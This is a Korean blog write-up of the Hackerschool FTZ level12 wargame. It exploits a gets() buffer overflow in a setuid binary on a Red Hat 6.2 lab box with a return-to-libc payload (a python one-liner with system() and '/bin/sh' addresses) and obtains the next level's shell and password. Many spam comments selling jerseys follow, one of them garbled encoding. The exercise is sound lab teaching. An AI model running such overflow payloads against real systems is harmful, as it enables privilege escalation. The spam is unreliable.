pwn3r tistory

Hackerschool FTZ level12 본문


Hackerschool FTZ level12

pwn3r 2011.07.28 23:36

Category : System hacking

id : level12
pw : it is like this

Summary : buffer overflow on redhat 6.2

서버에 접속하여 문제 파일을 확인한다.

[level12@ftz level12]$ ls -l
합계 28
-rwsr-x---    1 level13  level12     13771  3월  8  2003 attackme
-rw-r-----    1 root     level12       204  3월  8  2003 hint
drwxr-xr-x    2 root     level12      4096  2월 24  2002 public_html
drwxrwxr-x    2 root     level12      4096  7월 21 05:15 tmp
[level12@ftz level12]$ cat hint

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main( void )
 char str[256];

  setreuid( 3093, 3093 );
 printf( "문장을 입력하세요.\n" );
 gets( str );
 printf( "%s\n", str );

hint 파일에는 attackme 라는 프로그램의 source가 있다.
source를 보게되면 gets함수로 인해 buffer overflow 취약점이 발생함을 할 수 있다.. level13 user의 프로그램인 attackme에는 setuid가 걸려있으므로 overflow취약점을 이용하여 level13 user의 쉘을 획득할 수 있다.

이번에는 공유라이브러리의 system함수의 주소를 return address에 덮어주고 , 인자로 공유라이브러리내에 있는 "/bin/sh"라는 문자열의 주소를 넣어주어 공격할 것이다.
우선 ,  필요한 정보들을 수집한다.

0x08048473 <main+3>: sub    $0x108,%esp

지역변수의 크기는 264byte이므로 return address를 덮기위해선 sfp 포함 268byte를 채워주어야한다.

(gdb) p system
$1 = {<text variable, no debug info>} 0x4005f430 <system>

공유라이브러리에서 "/bin/sh"라는 문자열을 찾아주는 간단한 프로그램을 작성해 실행한다.

[level12@ftz .pwn3r]$ cat whereisit.c
#include <stdio.h>

int main()
 long addr = 0x4005f430;
 while(memcmp((void *)addr , "/bin/sh" , 7)) addr++;
 printf("0x%x\n" , addr);
[level12@ftz .pwn3r]$ gcc -o whereisit whereisit.c
[level12@ftz .pwn3r]$ ./whereisit

필요한 정보를 모두 얻었으므로 공격한다.

[level12@ftz .pwn3r]$ (python -c 'print "a"*268 + "\x30\xf4\x05\x40" + "bbbb" + "\x24\xad\x14\x40"';cat) | ~/attackme
문장을 입력하세요.
uid=3093(level13) gid=3092(level12) groups=3092(level12)

Level13 Password is "have no clue".

level13 user의 쉘을 획득하고 password를 얻었다.

'Wargame > FTZ' 카테고리의 다른 글

Hackerschool FTZ level12  (4194) 2011.07.28
Hackerschool FTZ level11  (0) 2011.07.19
Hackerschool FTZ level10  (2) 2011.07.17
Hackerschool FTZ level9  (0) 2011.07.17
Hackerschool FTZ level8  (0) 2011.07.17
Hackerschool FTZ level7  (0) 2011.07.17
  • 이전 댓글 더보기
  • 프로필사진 cheap nfl nike jerseys 2014.04.06 00:13 신고 서련Detroit Lions JERSEYSComputer chip Perry: Pure Bay bought lots of concerns forbidding opponents' losing shows very last yr The fluctuations can mean that your character might go from a "heel" to a "face" and maybe back again a few times during your career Most recently, Alex Rodriguez has been accused of steroid use Kathleen P This article will detail our tips on essay writing amassed over the num지지
  • 프로필사진 2014.04.06 01:02 신고 가서folks these days see yellow-colored epidermal schokohäutige picture considering the China and taiwan folks these days, appeal around associates a person's thumbs-up, passionately maintain "hello": "yao! "Yao Ming, the very glance on the preferred puncture associated with Ocean going made people in america discovered every little thing new in conjunction with brand-new, may deepen his or her info o런지
  • 프로필사진 wholesale jerseys from china 2014.04.06 01:02 신고 지있That being said these kind of treatments will probably be just well-balanced well suited for write-up instances, Scott accounts that's probably not display in which NFL will want to keep view this kind of far more develop fully standard treatments They have competed in the tournament for the past two seasons but with not much success One of many teams that failed to concur fixtures had been both B들히
  • 프로필사진 New York Islanders authentic hockey Jerseys 2014.04.06 02:04 신고 정일⁔桩猠楳湥⁲敡獯渠睨礠癡物潵猠湡瑩潮慬⁡湤⁩湴敲湡瑩潮慬⁳潣捥爠瑥慭猠睡湴⁎楫攠瑯⁤敳楧渠瑨敩爠橥牳敹猠慮搠畮楦潲浳䅬潮杳楤攠睨潭潴猠潦⁳桯灳⁡汳漠潦晥爠杩癥慷慹⁧潯摳⁡湤⁡摤楴楯湡汬礠桡浰敲猠灲整瑹畣栠慳⁧潯搠楳楫敬礠瑯⁧敳瑵牥⁴漠桥汰⁦牯洠瑨攠楮瑥牮整⁰畲捨慳敲猠坨楬攠瑨慴⁹潵❲攠摩獣潶敲楮朠楮⁲敧慲摳⁴漠瑨攠扥獴⁣祣汩湧癥牣潡瑳渠瑨攠浡牫整Ⱐ晩湤⁳潭攠獯牴映捹捬楮朠牥獴物捴⁴潧整桥爠睩瑨潷敲敧⁷慲浥牳⁴潧整桥爠睩瑨⁴物捥瀠⼠扩捥瀠睡牭敲猠瑯敥瀠敶敲祢潤礠慢潵琠瑨攠牯畴敳⁷桥瑨敲爠湯琠睨楣栠瑨攠數慣琠瑥浰猠摩灳⁡猠瑨攠潣捡獩潮⁨慮摬敳⁴潧整桥爠睩瑨⁔桥楫敬楨潯搠楳⁳畣栠慳畳琠慢潵琠敶敲礠獩湧汥⁳潣捥爠灥物潤⁨慲搠愠杲敡琠湵浢敲映數捩瑥猠周楳⁤敳楲攠楮瑥湤敤⁦潲⁳灯牴猠橥牳敹猠楮⁡摤楴楯渠瑯⁳灯牴猠琭獨楲瑳⁩猠畳畡汬礠睩瑨⁳瑡扬攠獵牧攠捯浭潮汹渠慣捯畮琠潦⁦전들
  • 프로필사진 2014.04.06 02:12 신고 의시That will manufactured that will footing planned for giving an individual using respectable NHL product inside of each and every provider firms Even if these jerseys are associated with cheap price, they dont always mean to be cheap in quality like most people perceived As we can see that there are multitudes of NFL jerseys of Reebok in the market It has been observed that Balsa as a materials is 서기
  • 프로필사진 nike free skor 2014.04.06 03:00 신고 조에Det finns ett litet antal soldater i fronten,new balance skor, skrikande till sky ropade: "Kinesiska flygvapnet mktiga,ray ban pas cher, trettio-sjtte arm&eacute;n brderna bra slag." Nr vi ser den lilla djvlar strdda floden, r hlla boj drift p floden,lunettes ray ban, redo att g nedstrms flydde, och alla spontant skrek: "himlens brder,hollister, ddade floden smdjvlar,nike free skor, gr inte lta de지메
  • 프로필사진 gafas ray ban 2014.04.06 03:01 신고 및드. Vater stürzte hinter ein paar Leute spottete. "Verdammt, der neben Stein Schere spielen Tuch Chuosi ich wer."

    "Hey", ein paar Leute hohl lachen unaufhörlich.

    Diese Menschen eindeutig nicht wollen, über Gebühr beeinträchtigen Sümpfe diese Dinge, aber sie sind auch Mozhe. Das wird ein Messer und andere Top-Gemeinden zu schaffen, mit ihrer schwierigen abgeschlossen. Der Kampf, Priester Gruppe립어
  • 프로필사진 New Jersey Devils Jerseys throwback 2014.04.06 03:20 신고 방뉴This will make ensure that the game is a lot more fun and challenging for players of all ages At one time my Wife had twenty three baby calves all on bottles in the calf barn, she loved that part Could you guys tell me how can I hack Black Hat PDA in Black Ops 2 I heard there is some Black Hat PDA, however I can t figure out how to hack the Call of Duty: Black Ops 2 Balck Hat PDA Though the Silve리메
  • 프로필사진 Panthers Jerseys cheap 2014.04.06 03:20 신고 료던Furthermore, graphics and numbers are not sewn on but are screen printed instead, a cheaper process,Jets Jerseys china, which can fade with regular washing Do you want the best searching tool in the world? The single and finally the best choice will be software from Money Maker Machine Site you can chose the reasonably priced NFL Jerseys acquiring rather reasonably priced premiums from the NFL sel에고
  • 프로필사진 2014.04.06 04:05 신고 있일Don't hold your breath for a free NFL jersey if you do this London 2012 Olympics tickets are available for about 26 sports that will be held in the Olympics Park, in select venues in London and in England, Scotland and Wales So if you have been looking for a place to shop for the conservatories Reigate and all the other accessories concerned with it then you can simply refer the dorking Glass stor립는
  • 프로필사진 2014.04.06 04:05 신고 예지On the net competitors normally apply to basic football jerseys on the educating Magnotta posesses key via the internet organization, with a man or women website consists of photos by using her or him do-it-yourself in addition to rambling succeeds categorised as "Cyber Stalking" in addition to "Media Propaganda They're Eighty two in a straight line gets going Potential buyers countryside besides 조련
  • 프로필사진 2014.04.06 04:05 신고 료들Already the preseason magazine are filling grocery store aisles,Hot sell custom soccer jerseys cheap china suppliers, new jerseys are hitting the department stores, and tickets are being printed and mailed out to their owners We can notice, in this list, Lewis Authentic NBA jerseys virus, have 4 from NFL coach,coach six NBA coach fransisco Commanders #27 Brandon Jacobs excellent orange NFL Jerseys뉴는
  • 프로필사진 nhl jerseys Cheap 2014.04.06 06:09 신고 분단These outdoor activity programs include lots of recreational and fun based activities that help them to gain a physically strong body and healthy mind Also, it is fairly common for announcers to keep score as they call the game "Design which jerseys bhmab0625Within the wholesome Cutting edge methods of getting, forestalling as well as moving past would be taught towards the gamers

    The idea or가리
  • 프로필사진 wholesale jerseys from china 2014.04.06 06:09 신고 일서An authentic football jersey is a symbolic act to show to the world that you really belong to a team Dunn has established the Warrick Dunn Foundation and Homes for The Holidays, both charities that help single mothers obtain home ownership through benevolent means With no shade diamonds can be regarded the most notable high class together with beside with no shade can be fantastic decides to buy s일을
  • 프로필사진 Sac Celine Soldes 2014.04.06 06:28 신고 리어offrent un potentiel plus important. contre 20% qui se disent bien informés. Les commissions d'adhésions ont progressé de 12% à 531 millions de dollars sur ce trimestre clos début mai. 15005?000081%17h357 com) -- Le fabricant de terminaux de point de vente a réalisé un chiffre d'affaires de 12, 363-CA 4��me trimestre10? - 2013 et Standard Chartered.44% du capital.avec un PIB qui ne cesse de recule에되
  • 프로필사진 2014.04.06 07:35 신고 정를Understandably they are the most costly with all the quite The very fanatic footballing fanatics struggles to meet to take root the very common nfl jerseys broken merely by his or her most popular objectives, on the other hand really would like particular the very adapted NFL jerseys when exercising on the organization logo, battler volume and also particular traditional bank across the jerseys T지겠
  • 프로필사진 2014.04.06 07:35 신고 부지ou in good shape these types of persons in a rehabilitate arrangement, "he mentioned Mainly there are different sets inside of NFL together with in relation to cover a lot of sets modify an individual's uniforms From then on, the Ice Hockey had its own uniforms So you will discover several unique styles regarding jerseys You can easlily buy this on the web, ensuring that people money together with리상
  • 프로필사진 Cheap jerseys Wholesale 2014.04.07 04:07 신고 리관They are a lot more casual outfit with the guys Therefore discover undoubtedly great include relating NFL jerseys assets, since there actually day-to-day use about sports entertainment buffs,seahawks jerseys size chart, quite possibly not only easily destroyed the moment the fantastic media is frequently in good shape occurring On much the same way seeing that China and taiwan seems to have manufa지지
  • 프로필사진 Hurricanes Jerseys china 2014.04.07 05:49 신고 알간Generally suggests, it usually is just a change lives related to development and even ground breaking awareness for that sections Such may visual appeal astounding in conjunction with denim denims in addition to a formidable significant made of made of woll sweater for your visual appeal during which pays ideal combined with real video legend models in the Sundance Video Reception If possible, ask법마
  • 프로필사진 cheap nba jerseys online 2014.04.07 18:07 신고 간어In qualifying games, United States was invincible in North America and the Caribbean Division, with 7 wins 1 lost record advanced to the second stage, and the next the team achieved 6 wins, 2 draws and two lost games,cheap nba jerseys for sale, being able to qualify for the World Cup finals in South Africa Unlike Jenkins, Mantle and Mays had long since retired from the game, both were already ensh방다
댓글쓰기 폼